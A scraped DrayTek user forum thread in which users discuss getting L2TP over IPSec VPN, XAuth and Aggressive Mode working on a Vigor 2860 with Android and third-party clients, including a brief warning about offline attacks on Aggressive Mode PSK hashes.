DrayTek UK Users' Community Forum
Help, Advice and Solutions from DrayTek Users
L2TP w/IPSec VPN - Specify Remote Node - Peer ID - Where?
- hornbyp
- Offline
- Big Contributor
Less
More
- Posts: 1323
- Thank you received: 0
21 Dec 2018 17:18 #93610
by hornbyp
Replied by hornbyp on topic Re: L2TP w/IPSec VPN - Specify Remote Node - Peer ID - Where
//cont'd//
This:
implies that it although it can authenticate a "user", it can also authenticate a "device". Draytek's implementation (on the 2860
An XAuth user (or user group) is a RAS user who authenticates when connecting to the security device using an AutoKey IKE VPN tunnel. Although both IKE and XAuth users can authenticate through an AutoKey IKE VPN tunnel, the authentication of IKE users is actually the authentication of VPN gateways or clients, while the authentication of XAuth users is the authentication of the individuals themselves. XAuth users must enter information that only they are supposed to know—their username and password.
Please Log in or Create an account to join the conversation.
- routintooter
- Topic Author
- Offline
- Junior Member
Less
More
- Posts: 20
- Thank you received: 0
22 Dec 2018 12:54 #93611
by routintooter
Replied by routintooter on topic Re: L2TP w/IPSec VPN - Specify Remote Node - Peer ID - Where
Thanks for that Hornbyp!
My friend said that trying to get X.509 working resulted in him losing a few hairs.
If have any more updates from tinkering, I'll add them here.
Thanks again.
My friend said that trying to get X.509 working resulted in him losing a few hairs.
If have any more updates from tinkering, I'll add them here.
Thanks again.
Please Log in or Create an account to join the conversation.
- hornbyp
- Offline
- Big Contributor
Less
More
- Posts: 1323
- Thank you received: 0
27 Dec 2018 01:37 #93618
by hornbyp
I tried a VPN client from Zyxel (Zywall?) ... which seems to be a rebranded version of the
Greenbow client
(and is a similar sort of price ). That connected quickly and easily to the 2860 , using Aggressive mode and a per-user key. So, whatever the issue is with Android, it does seem to be at the Android end.
However, having done some more research intoAggressive Mode , it seems it needs to be used with caution. If you're connecting directly to an ISP at each end of the link, the chance of the plain text PSK hash being intercepted is pretty low (unless the ISP is under the influence of a government agency!).
However, if you're connecting via some dodgy WiFi network (that you don't trust and hence the use of the VPN), it definitely could happen. Once the PSK hash has been acquired, an attacker can spend as long as they want, mounting offline attacks against it. So its use in (say) a Chinese hotel might not be advisable :o ...
See:
https://www.pivotpointsecurity.com/blog/vpn-security-risks-main-aggressive-mode/
Revisiting this, I remembered that I did get it working on Android ; the problem on Windows, being that it's only supported by the 3rd party (£) VPN clients. The downside to XAuth is that it also uses a Global PSK and needs a local (not Radius) Dial-in user. The global PSK is effectively authenticating the device - but, if compromised, doesn't seem to be of any use by itself (unlike the global "IPsec" General key).
Replied by hornbyp on topic Re: L2TP w/IPSec VPN - Specify Remote Node - Peer ID - Where
The Android client (8.0 and maybe others) can be made to useI wrote:
Aggressive Mode , along with its per-user PSK. Unfortunately, the Vigor 2860cannot be made to respond to it properly.
A variety of 3rd party VPN clients exist (though all seem to be commercial offerings). Some of these offerAggressive Mode . I might investigate if any of them can successfully connect to the Vigor 2860, as a means of shedding light on the failure point in (4 .) above.
I tried a VPN client from Zyxel (Zywall?) ... which seems to be a rebranded version of the
However, having done some more research into
However, if you're connecting via some dodgy WiFi network (that you don't trust and hence the use of the VPN), it definitely could
See:
XAuth authentication support, recently appeared on the Vigor 2860I also wrote:
. I'm puzzled as to how this has been implemented - and I've not really got it to work.
Revisiting this, I remembered that I did
Please Log in or Create an account to join the conversation.
Moderators: Chris, Sami
Copyright © 2024 DrayTek